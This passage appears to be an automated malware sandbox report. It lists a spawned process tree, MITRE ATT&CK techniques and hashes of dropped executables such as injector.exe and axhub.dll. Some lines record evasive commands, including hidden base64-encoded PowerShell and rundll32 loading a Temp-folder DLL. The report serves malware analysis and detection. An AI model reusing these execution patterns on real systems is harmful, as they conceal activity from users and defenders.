                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1444 -ip 1444
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:4364
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1444 -ip 1444
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2004
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1444 -ip 1444
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:512
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\vhitttg
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\vhitttg
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:3176
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1444 -ip 1444
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2708
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:2396
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4848
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:2036
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1664
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                PID:1660
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:2508
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2508 -s 600
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:844
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2508 -ip 2508
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3424

                                                                                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                    7
                                                                                                                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                                                                                                                                    Process Discovery

                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                    T1057

                                                                                                                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      54e9306f95f32e50ccd58af19753d929

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      6bd12d57291ad9b45253217828de40f1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      f0d238802104005032a2e1ad4cb18079d1771a41

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      371c9b2845c1898ae59b4bfd29d47d00134316515ed028511cca60383bf7672c

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      7032525a88928dfa17c882d3e91e399142fc878ebc0e71d611afc1b01aa9944ba76abef7d1f0efaa9a0cbb7898e97771c58386fd34b14f61815c4da4a4cbbd4a

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\File.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      254199404fccfb91d18c929ce584eef7

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      782d4fe5b1f4cd12af5fb6bc7cbd0392d205fe07

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      6348d04d59e1303a3aa2574cb2f9d98d3d91347d4f03444a15962062dccb1fdd

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      a20f98e59f2e5a16191befd7bf8bd52f5789653b9c1c2917c413d5ca5c2cbfbfa7bc2e8126ef433a979f72bbf6a3fa5b43de8a1eaa490692610101df10ea14a5

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\File.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      254199404fccfb91d18c929ce584eef7

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      782d4fe5b1f4cd12af5fb6bc7cbd0392d205fe07

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      6348d04d59e1303a3aa2574cb2f9d98d3d91347d4f03444a15962062dccb1fdd

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      a20f98e59f2e5a16191befd7bf8bd52f5789653b9c1c2917c413d5ca5c2cbfbfa7bc2e8126ef433a979f72bbf6a3fa5b43de8a1eaa490692610101df10ea14a5

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      2d0217e0c70440d8c82883eadea517b9

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      f3b7dd6dbb43b895ba26f67370af99952b7d83cb

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      2d0217e0c70440d8c82883eadea517b9

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      f3b7dd6dbb43b895ba26f67370af99952b7d83cb

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      b89068659ca07ab9b39f1c580a6f9d39

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      7e3e246fcf920d1ada06900889d099784fe06aa5

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      b89068659ca07ab9b39f1c580a6f9d39

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      7e3e246fcf920d1ada06900889d099784fe06aa5

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      b89068659ca07ab9b39f1c580a6f9d39

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      7e3e246fcf920d1ada06900889d099784fe06aa5

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      907b8a8bacc5432518151b830339539d

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      9d5a934d1291db04f88482e2c3e5f3053552e044

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      907b8a8bacc5432518151b830339539d

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      9d5a934d1291db04f88482e2c3e5f3053552e044

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      907b8a8bacc5432518151b830339539d

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      9d5a934d1291db04f88482e2c3e5f3053552e044

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      921b10ea055eb9c80737b07142de6d2e

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      6c2134159e68c8219a51a5b4dab4da33f2e0bad1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      f9f6ec4585db7b9e410b685e38f54db289671955dc39ab14a904745418a21350

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      80ae017b10e0ae9190b409efb667891f8c747ec34b236b5fd34e2f8c144da439f237480acc9b44673a82ea8c9ae7c3e3f18bdafc879b6753566ec0615f310130

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      921b10ea055eb9c80737b07142de6d2e

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      6c2134159e68c8219a51a5b4dab4da33f2e0bad1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      f9f6ec4585db7b9e410b685e38f54db289671955dc39ab14a904745418a21350

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      80ae017b10e0ae9190b409efb667891f8c747ec34b236b5fd34e2f8c144da439f237480acc9b44673a82ea8c9ae7c3e3f18bdafc879b6753566ec0615f310130

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      e0dc57de2c072d59fadf3d37fb7564c8

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      92aa85d8de4868a9aa9435b46b5b87ce737683e6

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      1d1673f737beed31a720b15d690affc829661853ccf91f74e7c3fdac26910c87

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      d2f0c50ea7fc47d72be986e25c5704bd84fe109b998ef858d2e178d478c4d180e16125885f96e1867690010a3a18ae5a571a5dc1a67de76759475a4efb4ff07d

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      e0dc57de2c072d59fadf3d37fb7564c8

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      92aa85d8de4868a9aa9435b46b5b87ce737683e6

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      1d1673f737beed31a720b15d690affc829661853ccf91f74e7c3fdac26910c87

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      d2f0c50ea7fc47d72be986e25c5704bd84fe109b998ef858d2e178d478c4d180e16125885f96e1867690010a3a18ae5a571a5dc1a67de76759475a4efb4ff07d

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      c7d966011247c4d60b35dde95d5dc7b1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      510b8858e6b69c8af57bcf2f88627bccb269d0dd

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      7f2e86caeaa4a0620410067957d8d140882cb320c4e98caf70d5d3815b50a390

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      50fd7aa7865a4e6015a8ef3c4bac5bf1104540e3bdc854ef2bf31d39c3b361857a473e3e4fe5ac1886a7ad5d77da235753ed33ec6b97c449932af53b15522c77

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      c7d966011247c4d60b35dde95d5dc7b1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      510b8858e6b69c8af57bcf2f88627bccb269d0dd

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      7f2e86caeaa4a0620410067957d8d140882cb320c4e98caf70d5d3815b50a390

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      50fd7aa7865a4e6015a8ef3c4bac5bf1104540e3bdc854ef2bf31d39c3b361857a473e3e4fe5ac1886a7ad5d77da235753ed33ec6b97c449932af53b15522c77

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      5fd2eba6df44d23c9e662763009d7f84

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      43530574f8ac455ae263c70cc99550bc60bfa4f1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      2991e2231855661e94ef80a4202487a9d7dc7bebccab9a0b2a786cf0783a051f

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      321a86725e533dedb5b74e17218e6e53a49fa6ffc87d7f7da0f0b8441a081fe785f7846a76f67ef03ec3abddacbe8906b20a2f3ce8178896ec57090ef7ab0eb7

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      d98e33b66343e7c96158444127a117f6

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      d98e33b66343e7c96158444127a117f6

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                      b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                      d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                      fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                      98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

